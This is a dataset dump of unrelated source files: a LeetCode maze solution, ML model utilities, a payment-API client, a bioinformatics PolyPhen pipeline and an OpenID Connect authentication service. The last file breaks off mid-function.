| 1.445313 | 1 |
leetcode/505.py | windniw/just-for-fun | 1 | 12760293 | <reponame>windniw/just-for-fun
"""
link: https://leetcode-cn.com/problems/the-maze-ii
problem: 求二维迷宫矩阵中,小球从 A 点到 B 点的最短路径,小球只能沿一个方向滚动直至碰壁
solution: BFS。广搜反复松弛,检查目标点是否优于之前搜索结果。
"""
class Solution:
    def shortestDistance(self, maze: List[List[int]], start: List[int], destination: List[int]) -> int:
        """Shortest rolling distance from ``start`` to ``destination``.

        The ball rolls in one direction until it hits a wall (cell value 1)
        or the border. Returns the minimum number of cells travelled, or -1
        when the destination cannot be reached (or the maze is empty).

        SPFA-style BFS relaxation: a stopping point is re-queued whenever a
        shorter distance to it is found. Uses a deque so dequeuing is O(1)
        instead of the O(n) ``list.pop(0)``.
        """
        from collections import deque

        if not maze or not maze[0]:
            return -1
        n, m = len(maze), len(maze[0])
        dist = [[-1] * m for _ in range(n)]
        dist[start[0]][start[1]] = 0
        queue = deque([(start[0], start[1])])
        directions = ((1, 0), (-1, 0), (0, 1), (0, -1))
        while queue:
            x, y = queue.popleft()
            for dx, dy in directions:
                # Roll from (x, y) until the next cell is a wall or off-grid.
                i, j, steps = x, y, 0
                while 0 <= i + dx < n and 0 <= j + dy < m and maze[i + dx][j + dy] == 0:
                    i += dx
                    j += dy
                    steps += 1
                # Relax the stopping point if this path is shorter.
                if dist[i][j] == -1 or dist[i][j] > dist[x][y] + steps:
                    dist[i][j] = dist[x][y] + steps
                    queue.append((i, j))
        return dist[destination[0]][destination[1]]
core/argo/core/TrainingLauncher.py | szokejokepu/natural-rws | 0 | 12760294 | from .ArgoLauncher import ArgoLauncher
import pdb
class TrainingLauncher(ArgoLauncher):
    """Launcher that drives the training loop of an Argo model."""

    def execute(self, model, opts, **kwargs):
        """Run the model's training procedure."""
        model.train()

    def initialize(self, model, dataset, config):
        """Prepare the launcher, then open the model's session."""
        super().initialize(model, dataset, config)
        model.create_session(config)
models.py | tomaszpienta/Evolutionary-hyperparameter-selection-in-deep-neural-networks- | 0 | 12760295 | '''DATALOADERS'''
def LoadModel(name):
    """Return the dataset-specific hyperparameters for a hyperspectral dataset.

    Args:
        name: dataset identifier, one of 'PaviaU', 'IndianPines', 'Botswana',
            'KSC', 'Salinas', 'SalinasA' or 'Samson'.

    Returns:
        Tuple ``(Width, Height, Bands, samples, D, H, W, classes, patch)``
        where ``(D, H, W)`` is the size of the raw 3-D cube,
        ``(Height, Width, Bands)`` the patch size, ``samples`` the number of
        training samples, ``classes`` the class-name list (empty when not
        recorded) and ``patch`` a patch-count budget.

    Raises:
        ValueError: if ``name`` is not a known dataset (the original
            if/elif chain raised UnboundLocalError in that case).
    """
    # Per-dataset configuration, keyed by dataset name:
    # (D, H, W, Height, Width, Bands, samples, patch, classes)
    configs = {
        'PaviaU': (610, 340, 103, 27, 21, 103, 2400, 300000, []),
        'IndianPines': (145, 145, 200, 19, 17, 200, 4000, 300000, [
            "Undefined", "Alfalfa", "Corn-notill", "Corn-mintill",
            "Corn", "Grass-pasture", "Grass-trees",
            "Grass-pasture-mowed", "Hay-windrowed", "Oats",
            "Soybean-notill", "Soybean-mintill", "Soybean-clean",
            "Wheat", "Woods", "Buildings-Grass-Trees-Drives",
            "Stone-Steel-Towers"]),
        'Botswana': (1476, 256, 145, 31, 21, 145, 1500, 30000, [
            "Undefined", "Water", "Hippo grass",
            "Floodplain grasses 1", "Floodplain grasses 2",
            "Reeds", "Riparian", "Firescar", "Island interior",
            "Acacia woodlands", "Acacia shrublands",
            "Acacia grasslands", "Short mopane", "Mixed mopane",
            "Exposed soils"]),
        # NOTE(review): "Wate" kept verbatim from the original -- presumably
        # a truncated "Water"; confirm against the KSC ground-truth labels.
        'KSC': (512, 614, 176, 31, 27, 176, 2400, 30000, [
            "Undefined", "Scrub", "Willow swamp",
            "Cabbage palm hammock", "Cabbage palm/oak hammock",
            "Slash pine", "Oak/broadleaf hammock",
            "Hardwood swamp", "Graminoid marsh", "Spartina marsh",
            "Cattail marsh", "Salt marsh", "Mud flats", "Wate"]),
        'Salinas': (512, 217, 204, 21, 17, 204, 2600, 300000, []),
        'SalinasA': (83, 86, 204, 15, 11, 204, 2400, 300000, []),
        'Samson': (95, 95, 156, 10, 10, 156, 1200, 30000, []),
    }
    try:
        D, H, W, Height, Width, Bands, samples, patch, classes = configs[name]
    except KeyError:
        raise ValueError('Unknown dataset name: %r' % name)
    return Width, Height, Bands, samples, D, H, W, classes, patch
| 2.265625 | 2 |
pyrave/preauth.py | Olamyy/pyrave | 11 | 12760296 | from pyrave.base import BaseRaveAPI
from pyrave.encryption import RaveEncryption
class Preauth(BaseRaveAPI):
    """
    Preauthorization Class

    Wraps the Rave preauthorization endpoints: charge, capture,
    refund/void and merchant refund.
    """
    def __init__(self):
        super(Preauth, self).__init__()
        # Encryption helper used to build the 'client' payload of a charge
        self.rave_enc = RaveEncryption()

    def preauthorise_card(self, log_url=False, **kwargs):
        """Preauthorise a card charge.

        :param log_url: if True, log the request URL
        :param kwargs: card/charge fields forwarded to the encryptor
        :return: the API response, or the falsy encryption result on failure
        """
        encrypted_data = self.rave_enc.encrypt(preauthorised=True, **kwargs)
        if not encrypted_data:
            return encrypted_data
        request_data = {
            # NOTE(review): PBFPubKey is documented as the *public* key but is
            # filled with self.secret_key here -- confirm against the Rave API.
            "PBFPubKey": self.secret_key,
            "client": encrypted_data[1],
            "algo": encrypted_data[2]
        }
        url = self.rave_url_map.get("payment_endpoint") + "charge"
        return self._exec_request("POST", url, request_data, log_url=log_url)

    def capture_preauthorised_transaction(self, transaction_reference, log_url=False):
        """Capture a previously preauthorised transaction.

        :param log_url: if True, log the request URL
        :param transaction_reference: the flwRef of the preauthorised charge
        :return: the API response
        """
        request_data = {
            "SECKEY": self.secret_key,
            "flwRef": transaction_reference,
        }
        url = self.rave_url_map.get("payment_endpoint") + "capture"
        return self._exec_request("POST", url, request_data, log_url=log_url)

    def refund_or_void_transaction(self, action, reference_id, log_url=False):
        """Refund or void a preauthorised transaction.

        :param log_url: if True, log the request URL
        :param action: either "refund" or "void" (passed through to the API)
        :param reference_id: the transaction reference
        :return: the API response
        """
        request_data = {
            "ref": reference_id,
            "action": action,
            "SECKEY": self.secret_key
        }
        url = self.rave_url_map.get("payment_endpoint") + "refundorvoid"
        return self._exec_request("POST", url, request_data, log_url=log_url)

    def refund(self, reference_id, log_url=False):
        # Merchant-initiated refund via the dedicated refund endpoint
        request_data = {
            "ref": reference_id,
            "seckey": self.secret_key
        }
        url = self.rave_url_map.get("merchant_refund_endpoint")
        return self._exec_request("POST", url, request_data, log_url=log_url)
| 2.3125 | 2 |
obsolete/pipeline_polyphen.py | kevinrue/cgat-flow | 11 | 12760297 | <reponame>kevinrue/cgat-flow<gh_stars>10-100
"""
Polyphen prediction pipeline
=============================
:Author: <NAME>
:Release: $Id: pipeline_snps.py 2870 2010-03-03 10:20:29Z andreas $
:Date: |today|
:Tags: Python
Purpose
-------
Input:
Indels in pileup format.
Usage
-----
Type::
python <script_name>.py --help
for command line help.
Code
----
"""
from ruffus import *
import sys
import glob
import os
import itertools
import sqlite3
import cgatcore.experiment as E
from cgatcore import pipeline as P
import pipelineGeneset as PGeneset
###################################################################
###################################################################
###################################################################
# read global options from configuration file
P.getParameters(
["%s/pipeline.ini" % os.path.splitext(__file__)[0],
"../pipeline.ini",
"pipeline.ini"],
defaults={'polyphen_modes': ""})
P.PARAMS.update(
{"transcripts": "transcripts.gtf.gz",
"genes": 'genes.gtf.gz',
"annotation": 'geneset_regions.gff.gz',
"peptides": 'peptides.fasta',
"cdna": 'cdna.fasta',
"cds": 'cds.fasta'})
PARAMS = P.PARAMS
PGeneset.PARAMS = PARAMS
SEPARATOR = "|"
###################################################################
###################################################################
###################################################################
# gene set section
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], PARAMS['annotation'])
def buildGeneRegions(infile, outfile):
    '''annotate genomic regions with reference gene set.

    Only considers protein coding genes. In case of overlapping
    genes, only take the longest (in genomic coordinates).
    Genes not on UCSC contigs are removed.

    Thin wrapper around :func:`PGeneset.buildGeneRegions`.
    '''
    PGeneset.buildGeneRegions(infile, outfile)
############################################################
############################################################
############################################################
@follows(buildGeneRegions)
@files(PARAMS["ensembl_filename_gtf"], PARAMS['genes'])
def buildGenes(infile, outfile):
    '''build a collection of exons from the protein-coding
    section of the ENSEMBL gene set. The exons include both CDS
    and UTR.

    The set is filtered in the same way as in :meth:`buildGeneRegions`.

    Thin wrapper around :func:`PGeneset.buildProteinCodingGenes`.
    '''
    PGeneset.buildProteinCodingGenes(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], "gene_info.load")
def loadGeneInformation(infile, outfile):
    '''load gene information into the database (delegates to PGeneset).'''
    PGeneset.loadGeneInformation(infile, outfile)
############################################################
############################################################
############################################################
@files(buildGenes, "gene_stats.load")
def loadGeneStats(infile, outfile):
    '''load per-gene statistics into the database (delegates to PGeneset).'''
    PGeneset.loadGeneStats(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], PARAMS["transcripts"])
def buildTranscripts(infile, outfile):
    '''build a collection of transcripts from the protein-coding
    section of the ENSEMBL gene set.

    Only CDS are used.

    Thin wrapper around :func:`PGeneset.buildProteinCodingTranscripts`.
    '''
    PGeneset.buildProteinCodingTranscripts(infile, outfile)
############################################################
############################################################
############################################################
@transform(buildTranscripts, suffix(".gtf.gz"), "_gtf.load")
def loadTranscripts(infile, outfile):
    '''load the transcript set into the database (delegates to PGeneset).'''
    PGeneset.loadTranscripts(infile, outfile)
############################################################
############################################################
############################################################
@files(buildTranscripts, "transcript_stats.load")
def loadTranscriptStats(infile, outfile):
    '''load per-transcript statistics into the database (delegates to PGeneset).'''
    PGeneset.loadTranscriptStats(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], "transcript_info.load")
def loadTranscriptInformation(infile, outfile):
    '''load transcript information into the database, optionally
    restricted to protein-coding transcripts
    (controlled by the ``ensembl_only_proteincoding`` option).'''
    PGeneset.loadTranscriptInformation(infile,
                                       outfile,
                                       only_proteincoding=PARAMS["ensembl_only_proteincoding"])
###################################################################
###################################################################
###################################################################
@files(((PARAMS["ensembl_filename_pep"], PARAMS["peptides"]), ))
def buildPeptideFasta(infile, outfile):
    '''load ENSEMBL peptide file

    *infile* is an ENSEMBL .pep.all.fa.gz file.

    Thin wrapper around :func:`PGeneset.buildPeptideFasta`.
    '''
    PGeneset.buildPeptideFasta(infile, outfile)
###################################################################
###################################################################
###################################################################
@files(((PARAMS["ensembl_filename_cdna"], PARAMS["cdna"]), ))
def buildCDNAFasta(infile, outfile):
    '''load ENSEMBL cDNA file

    *infile* is an ENSEMBL .cdna.all.fa.gz file.

    Thin wrapper around :func:`PGeneset.buildCDNAFasta`.
    '''
    PGeneset.buildCDNAFasta(infile, outfile)
###################################################################
###################################################################
###################################################################
@follows(loadTranscriptInformation)
@files([(PARAMS["transcripts"], PARAMS["cds"]), ])
def buildCDSFasta(infile, outfile):
    '''build cds sequences from peptide and cds file.

    *infile* is the transcript gtf built by :func:`buildTranscripts`.

    Thin wrapper around :func:`PGeneset.buildCDSFasta`.
    '''
    PGeneset.buildCDSFasta(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_pep"], "protein_stats.load")
def loadProteinStats(infile, outfile):
    '''load per-protein statistics into the database (delegates to PGeneset).'''
    PGeneset.loadProteinStats(infile, outfile)
############################################################
############################################################
############################################################
@files(((None, "benchmark.ids"), ))
def buildBenchmarkSet(infile, outfile):
    '''build a benchmark set of protein ids.

    TODO: not implemented -- currently a placeholder that produces nothing.
    '''
    pass
############################################################
############################################################
############################################################
@files(((buildBenchmarkSet, "benchmark.input"),))
def buildBenchmarkInput(infile, outfile):
    '''build polyphen benchmark input.

    Dumps the transcript/protein id map from the database into a temporary
    tsv file, then pipes the extracted CDS sequences through
    ``fasta2variants.py`` and ``substitute_tokens.py``.

    Note: P.run() interpolates ``%(...)s`` placeholders in ``statement``
    from the caller's local variables and PARAMS.
    '''

    tmpfile = P.getTempFile()

    dbhandle = sqlite3.connect(PARAMS["database_name"])
    cc = dbhandle.cursor()
    statement = '''
    SELECT DISTINCT transcript_id, protein_id FROM peptide_info
    '''
    cc.execute(statement)
    tmpfile.write("transcript_id\tprotein_id\n")
    tmpfile.write("\n".join(["\t".join(x) for x in cc]))
    tmpfile.write("\n")
    # close so the map is flushed to disk before the shell pipeline reads it
    # (the original left the handle open, risking a partially written file)
    tmpfile.close()
    tmpfilename = tmpfile.name

    # Fixes vs original: added the missing '|' before fasta2variants.py and
    # corrected the '%(scripstdir)s' typo (would have raised a KeyError).
    statement = '''
    perl %(scriptsdir)s/extract_fasta.pl %(infile)s
    < cds.fasta
    | python %(scriptsdir)s/fasta2variants.py --is-cds
    | python %(scriptsdir)s/substitute_tokens.py
             --map-tsv-file=%(tmpfilename)s
    > %(outfile)s
    '''
    P.run()

    os.unlink(tmpfilename)
###################################################################
###################################################################
###################################################################
@transform("*.input", suffix(".input"), ".features")
def buildPolyphenFeatures(infile, outfile):
    '''run polyphen on the cluster.

    To do this, first send uniref to all nodes:

    python ~/cgat/cluster_distribute.py
           --collection=andreas
           /net/cpp-group/tools/polyphen-2.0.18/nrdb/uniref100*.{pin,psd,psi,phr,psq,pal}
    '''

    nsnps = len([x for x in open(infile)])

    # NOTE: `to_cluster`, `job_array` and `statement` are picked up by P.run()
    # from the caller's local variables (cgat pipeline convention) -- do not
    # rename them.
    to_cluster = True
    # one array task per `stepsize` SNPs, at least 1000 per task
    stepsize = max(int(nsnps / 200000.0), 1000)
    job_array = (0, nsnps, stepsize)
    E.info("running array jobs on %i snps" % nsnps)

    scratchdir = os.path.join(os.path.abspath("."), "scratch")
    try:
        os.mkdir(scratchdir)
    except OSError:
        # directory already exists
        pass

    resultsdir = outfile + ".dir"
    try:
        os.mkdir(resultsdir)
    except OSError:
        pass

    statement = '''
    /net/cpp-group/tools/polyphen-2.0.18/bin/run_pph_cpp.pl
       -s %(peptides)s
       -b %(polyphen_blastdb)s
       -d %(scratchdir)s
       %(infile)s > %(resultsdir)s/%(outfile)s.$SGE_TASK_ID 2> %(resultsdir)s/%(outfile)s.err.$SGE_TASK_ID
    '''
    P.run()

    # collect the per-task outputs; run locally (not as an array job)
    to_cluster = False
    job_array = None

    statement = '''find %(resultsdir)s -name "*.err.*" -exec cat {} \;
                | gzip
                > %(outfile)s.log.gz'''
    P.run()

    statement = '''find %(resultsdir)s -not -name "*.err.*" -exec cat {} \;
                | gzip
                > %(outfile)s'''
    P.run()
###################################################################
###################################################################
###################################################################
@files([(x, "%s_%s.output.gz" % (x[:-len(".features.gz")], y), y)
        for x, y in itertools.product(
            glob.glob("*.features.gz"), P.asList(PARAMS["polyphen_models"]))])
def runPolyphen(infile, outfile, model):
    '''run POLYPHEN on feature tables to classify SNPs.

    One job per (feature file, polyphen model) combination.
    '''

    # `to_cluster` and `statement` are read by P.run() from the caller's
    # local variables (cgat pipeline convention).
    to_cluster = False

    # need to run in chunks for large feature files
    statement = """gunzip
    < %(infile)s
    | %(cmd-farm)s
        --split-at-lines=10000
        --output-header
        "perl %(polyphen_home)s/bin/run_weka_cpp.pl
           -l %(polyphen_home)s/models/%(model)s.UniRef100.NBd.f11.model
           -p
           %%STDIN%%"
    | gzip > %(outfile)s
    """

    P.run()
    return
###################################################################
###################################################################
###################################################################
@transform(buildBenchmarkInput, suffix(".input"), ".load")
def loadPolyphenWeights(infile, outfile):
    '''load polyphen input data.'''

    table = "weights"

    # NOTE(review): the cut keeps a column named 'snpid' but the index is
    # created on 'snp_id' -- looks inconsistent; confirm the column name.
    statement = '''
    cat < %(infile)s
    | python %(scriptsdir)s/csv_cut.py snpid counts weight
    |python %(scriptsdir)s/csv2db.py %(csv2db_options)s
              --add-index=snp_id
              --table=%(table)s
    > %(outfile)s
    '''
    P.run()
###################################################################
###################################################################
###################################################################
@transform(runPolyphen, suffix(".output.gz"), ".load")
def loadPolyphen(infile, outfile):
    '''load polyphen results.

    The comment column is ignored (only the first 55 columns are kept).
    '''

    table = P.toTable(outfile)

    # rename 'o_acc' to 'protein_id' and strip padding spaces before loading
    statement = '''gunzip
    < %(infile)s
    | perl -p -e "s/o_acc/protein_id/; s/ +//g"
    | cut -f 1-55
    |python %(scriptsdir)s/csv2db.py %(csv2db_options)s
              --add-index=snp_id
              --add-index=protein_id
              --table=%(table)s
              --map=effect:str
    > %(outfile)s
    '''
    P.run()
@follows(loadTranscripts,
         loadTranscriptInformation,
         loadGeneStats,
         loadGeneInformation,
         buildPeptideFasta,
         buildCDSFasta)
def prepare():
    '''aggregate target: run all preparatory gene-set tasks.'''
    pass
if __name__ == "__main__":
    # delegate command-line handling to the cgat pipeline framework
    sys.exit(P.main(sys.argv))
| 1.601563 | 2 |
malaya_speech/train/model/revsic_glowtts/flow/inv1x1conv.py | ishine/malaya-speech | 0 | 12760298 | <reponame>ishine/malaya-speech
"""
MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from typing import Tuple
import tensorflow as tf
from malaya_speech.train.model.utils import shape_list
class Inv1x1Conv(tf.keras.Model):
    """Invertible 1x1 grouped convolution.

    The weight is initialized as a random orthogonal matrix (QR of a normal
    sample), so the initial transform is volume-preserving.
    NOTE(review): `grouping`/`recover` split the group axis in halves, which
    assumes `groups` is even -- confirm with callers.
    """
    def __init__(self, groups):
        """Initializer.
        Args:
            groups: int, size of the convolution groups.
        """
        super(Inv1x1Conv, self).__init__()
        self.groups = groups
        # [groups, groups]
        weight, _ = tf.linalg.qr(tf.random.normal([groups, groups]))
        self.weight = tf.Variable(weight)

    def transform(self, inputs: tf.Tensor, mask: tf.Tensor, weight: tf.Tensor) \
            -> Tuple[tf.Tensor, tf.Tensor]:
        """Convolve inputs.
        Args:
            inputs: [tf.float32; [B, T, C]], input tensor.
            mask: [tf.float32, [B, T]], sequence mask.
            weight: [tf.float32; [G, G]], convolutional weight.
        Returns:
            outputs: [tf.float32; [B, T, C]], convolved tensor.
            logdet: [tf.float32; [B]], log-determinant of conv2d derivation.
        """
        # [B, T, C // G, G]
        x = self.grouping(inputs)
        # [B, T, C // G, G]; 1x1 conv == matmul along the last axis
        x = tf.nn.conv2d(x, weight[None, None], 1, padding='SAME')
        # []
        _, dlogdet = tf.linalg.slogdet(weight)
        # [B]; scale by the number of masked timesteps times C // G
        dlogdet = dlogdet * tf.reduce_sum(mask, axis=-1) * \
            tf.cast(tf.shape(x)[2], tf.float32)
        # [B, T, C]
        outputs = self.recover(x)
        # [B, T, C], [B]
        return outputs, dlogdet

    def call(self, inputs: tf.Tensor, mask: tf.Tensor) \
            -> Tuple[tf.Tensor, tf.Tensor]:
        """Forward 1x1 convolution.
        Args:
            inputs: [tf.float32; [B, T, C]], input tensor.
            mask: [tf.float32, [B, T]], sequence mask.
        Returns:
            outputs: [tf.float32; [B, T, C]], convolved tensor.
            logdet: [tf.float32; [B]], log-determinant of conv2d derivation.
        """
        return self.transform(inputs, mask, self.weight)

    def inverse(self, inputs: tf.Tensor, mask: tf.Tensor) \
            -> Tuple[tf.Tensor, tf.Tensor]:
        """Inverse 1x1 convolution (uses the matrix inverse of the weight).
        Args:
            inputs: [tf.float32; [B, T, C]], input tensor.
            mask: [tf.float32, [B, T]], sequence mask.
        Returns:
            outputs: [tf.float32; [B, T, C]], convolved tensor.
        """
        outputs, _ = self.transform(inputs, mask, tf.linalg.inv(self.weight))
        return outputs

    def grouping(self, x: tf.Tensor) -> tf.Tensor:
        """Grouping tensor.
        Args:
            x: [tf.float32; [B, T, C]], input tensor.
        return:
            [tf.float32; [B, T, C // G, G]], grouped tensor.
        """
        # B, T, C
        bsize, timestep, channels = shape_list(x)
        # [B, T, 2, C // G, G // 2]
        x = tf.reshape(x, [bsize, timestep, 2, channels // self.groups, self.groups // 2])
        # [B, T, C // G, 2, G // 2]
        x = tf.transpose(x, [0, 1, 3, 2, 4])
        # [B, T, C // G, G]
        return tf.reshape(x, [bsize, timestep, channels // self.groups, self.groups])

    def recover(self, x: tf.Tensor) -> tf.Tensor:
        """Recover grouped tensor (exact inverse of `grouping`).
        Args:
            x: [tf.float32; [B, T, C // G, G]], grouped tensor.
        Returns:
            [tf.float32; [B, T, C]], recovered.
        """
        # B, T, C // G, G(=self.groups)
        bsize, timestep, splits, _ = shape_list(x)
        # [B, T, C // G, 2, G // 2]
        x = tf.reshape(x, [bsize, timestep, splits, 2, self.groups // 2])
        # [B, T, 2, C // G, G // 2]
        x = tf.transpose(x, [0, 1, 3, 2, 4])
        # [B, T, C]
        return tf.reshape(x, [bsize, timestep, splits * self.groups])
| 1.804688 | 2 |
nagare/services/security/oidc_auth.py | nagareproject/services-security-oidc | 0 | 12760299 | # Encoding: utf-8
# --
# Copyright (c) 2008-2021 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
# --
import os
import time
import copy
import threading
from base64 import urlsafe_b64encode
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
import requests
from jwcrypto import jwk, jws
from jwcrypto.common import JWException
from python_jwt import _JWTError, generate_jwt, process_jwt, verify_jwt
from nagare import partial, log
from nagare.renderers import xml
from nagare.services.security import cookie_auth
class Login(xml.Component):
    """Renderable component that starts the OIDC authorization-code flow.

    Rendering it emits a 307 redirect to the provider's authorization
    endpoint; an optional callback action is replayed after authentication.
    """
    ACTION_PRIORITY = 5

    def __init__(self, manager, renderer, scopes, location):
        # manager: the Authentication service building the auth request
        self.manager = manager
        self.renderer = renderer
        self.scopes = scopes
        # location: path the provider redirects back to
        self.location = location
        self._action = None
        self.with_request = False
        self.args = ()
        self.kw = {}

    @partial.max_number_of_args(2)
    def action(self, action, args, with_request=False, **kw):
        """Register the callback to invoke once authentication completes."""
        self._action = action
        self.with_request = with_request
        self.args = args
        self.kw = kw

        return self

    def set_sync_action(self, action_id, params):
        # Synchronous actions are not supported by this component
        pass

    def render(self, h):
        """Render as a 307 redirect to the provider authorization endpoint."""
        if self._action is not None:
            # Register the post-auth callback; its id travels in the OAuth2 state
            action_id, _ = self.renderer.register_callback(
                self,
                self.ACTION_PRIORITY,
                self._action,
                self.with_request, *self.args, **self.kw
            )
        else:
            action_id = None

        _, url, params, _ = self.manager.create_auth_request(
            h.session_id, h.state_id, action_id,
            h.request.create_redirect_url(self.location),
            self.scopes
        )

        response = h.response
        response.status_code = 307
        response.headers['Location'] = url + '?' + urlencode(params)

        return response
class Authentication(cookie_auth.Authentication):
    """Cookie-based authentication backed by an OpenID Connect provider."""
    LOAD_PRIORITY = cookie_auth.Authentication.LOAD_PRIORITY + 1

    # Endpoints that must be configured (or discovered) for the flow to work
    REQUIRED_ENDPOINTS = {'authorization_endpoint', 'token_endpoint'}
    ENDPOINTS = REQUIRED_ENDPOINTS | {'discovery_endpoint', 'userinfo_endpoint', 'end_session_endpoint'}
    # Standard JWT/OIDC claims not kept as application credentials
    EXCLUDED_CLAIMS = {'iss', 'aud', 'exp', 'iat', 'auth_time', 'nonce', 'acr', 'amr', 'azp'} | {'session_state', 'typ', 'nbf'}

    # Configuration schema merged over the cookie authentication base spec
    CONFIG_SPEC = dict(
        copy.deepcopy(cookie_auth.Authentication.CONFIG_SPEC),
        host='string(default="localhost", help="server hostname")',
        port='integer(default=None, help="server port")',
        ssl='boolean(default=True, help="HTTPS protocol")',
        proxy='string(default=None, help="HTTP/S proxy to use")',
        verify='boolean(default=True, help="SSL certificate verification")',
        timeout='integer(default=5, help="communication timeout")',
        client_id='string(help="application identifier")',
        client_secret='string(default="", help="application authentication")',
        secure='boolean(default=True, help="JWT signature verification")',
        algorithms='string_list(default=list({}), help="accepted signing/encryption algorithms")'.format(', '.join(jws.default_allowed_algs)),
        key='string(default=None, help="cookie encoding key")',
        jwks_uri='string(default=None, help="JWK keys set document")',
        issuer='string(default=None, help="server identifier")'
    )
    # Cookies are optional and unencrypted by default for this manager
    CONFIG_SPEC['cookie']['activated'] = 'boolean(default=False)'
    CONFIG_SPEC['cookie']['encrypt'] = 'boolean(default=False)'
    CONFIG_SPEC.update({endpoint: 'string(default=None)' for endpoint in ENDPOINTS})
    def __init__(
            self,
            name, dist,
            client_id, client_secret='', secure=True, algorithms=jws.default_allowed_algs,
            host='localhost', port=None, ssl=True, verify=True, timeout=5, proxy=None,
            key=None, jwks_uri=None, issuer=None,
            services_service=None,
            **config
    ):
        """Initialize the OIDC authentication service.

        NOTE(review): `algorithms` defaults to the shared module-level list
        `jws.default_allowed_algs` -- confirm callers never mutate it.
        """
        services_service(
            super(Authentication, self).__init__, name, dist,
            client_id=client_id, client_secret=client_secret, secure=secure, algorithms=algorithms,
            host=host, port=port, ssl=ssl, verify=verify, timeout=timeout, proxy=proxy,
            key=key, jwks_uri=jwks_uri, issuer=issuer,
            **config
        )

        # Key used to encrypt the OAuth2 'state' / sign the JWT cookie;
        # random per process when not configured
        self.key = key or urlsafe_b64encode(os.urandom(32)).decode('ascii')
        self.jwk_key = jwk.JWK(kty='oct', k=self.key)
        self.timeout = timeout
        self.client_id = client_id
        self.client_secret = client_secret
        self.secure = secure
        self.algorithms = algorithms
        self.verify = verify
        self.proxies = {'http': proxy, 'https': proxy} if proxy else None
        self.issuer = issuer

        # Provider signing keys cache (refreshed per Cache-Control max-age)
        self.jwks_uri = jwks_uri
        self.jwks_expiration = None
        self.jwks_lock = threading.Lock()
        self.signing_keys = jwk.JWKSet()

        self.ident = name

        if not port:
            port = 443 if ssl else 80

        # Interpolation context for endpoint URL templates from the config
        endpoint_params = dict(
            config,
            scheme='https' if ssl else 'http',
            host=host,
            port=port,
            base_url='{}://{}:{}'.format(('https' if ssl else 'http'), host, port)
        )
        self.endpoints = {endpoint: (config[endpoint] or '').format(**endpoint_params) for endpoint in self.ENDPOINTS}
def send_request(self, method, url, params=None, data=None):
r = requests.request(
method, url, params=params or {}, data=data or {},
verify=self.verify, timeout=self.timeout, proxies=self.proxies
)
r.raise_for_status()
return r
def create_discovery_request(self):
discovery_endpoint = self.endpoints['discovery_endpoint']
return (None, None, None, None) if discovery_endpoint is None else ('GET', discovery_endpoint, {}, {})
    def create_auth_request(self, session_id, state_id, action_id, redirect_url, scopes=(), **params):
        """Build the provider authorization request.

        The continuation (session id, state id, callback action id) is
        encrypted into the OAuth2 ``state`` parameter so it round-trips
        through the provider without being tamperable.
        """
        state = b'%d#%d#%s' % (session_id, state_id, (action_id or '').encode('ascii'))

        params = dict({
            'response_type': 'code',
            'client_id': self.client_id,
            'redirect_uri': redirect_url,
            # 'openid' scope is mandatory for OIDC
            'scope': ' '.join({'openid'} | set(scopes)),
            'access_type': 'offline',
            'state': '#{}#{}'.format(self.ident, self.encrypt(state).decode('ascii'))
        }, **params)

        return 'GET', self.endpoints['authorization_endpoint'], params, {}
def create_token_request(self, redirect_url, code):
payload = {
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': redirect_url,
'client_id': self.client_id,
'client_secret': self.client_secret
}
return 'POST', self.endpoints['token_endpoint'], {}, payload
def create_refresh_token_request(self, refresh_token):
payload = {
'grant_type': 'refresh_token',
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': refresh_token
}
return 'POST', self.endpoints['token_endpoint'], {}, payload
def create_end_session_request(self, refresh_token):
payload = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': refresh_token
}
return 'POST', self.endpoints['end_session_endpoint'], {}, payload
def create_userinfo_request(self, access_token):
return 'POST', self.endpoints.get('userinfo_endpoint'), {}, {'access_token': access_token}
    def fetch_keys(self):
        """Refresh the cached provider JWK signing keys when their TTL expired."""
        if self.jwks_uri and self.jwks_expiration and (time.time() > self.jwks_expiration):
            with self.jwks_lock:
                logger = log.get_logger('.keys', self.logger)

                certs = self.send_request('GET', self.jwks_uri)
                new_keys = set(k['kid'] for k in certs.json()['keys'])
                keys = {key.key_id for key in self.signing_keys['keys']}
                # Only re-parse the key set when the key ids actually changed
                if new_keys != keys:
                    logger.debug('New signing keys fetched: {} -> {}'.format(sorted(keys), sorted(new_keys)))
                    self.signing_keys = jwk.JWKSet.from_json(certs.text)
                else:
                    logger.debug('Same signing keys fetched: {}'.format(sorted(keys)))

                # Honour the provider's Cache-Control max-age for the next refresh
                cache_controls = [v.split('=') for v in certs.headers['Cache-Control'].split(',') if '=' in v]
                cache_controls = {k.strip(): v.strip() for k, v in cache_controls}
                max_age = cache_controls.get('max-age')
                if max_age and max_age.isdigit():
                    logger.debug('Signing keys max age: {}'.format(max_age))
                    self.jwks_expiration = time.time() + int(max_age)
                else:
                    # No max-age: disable further refreshes until reconfigured
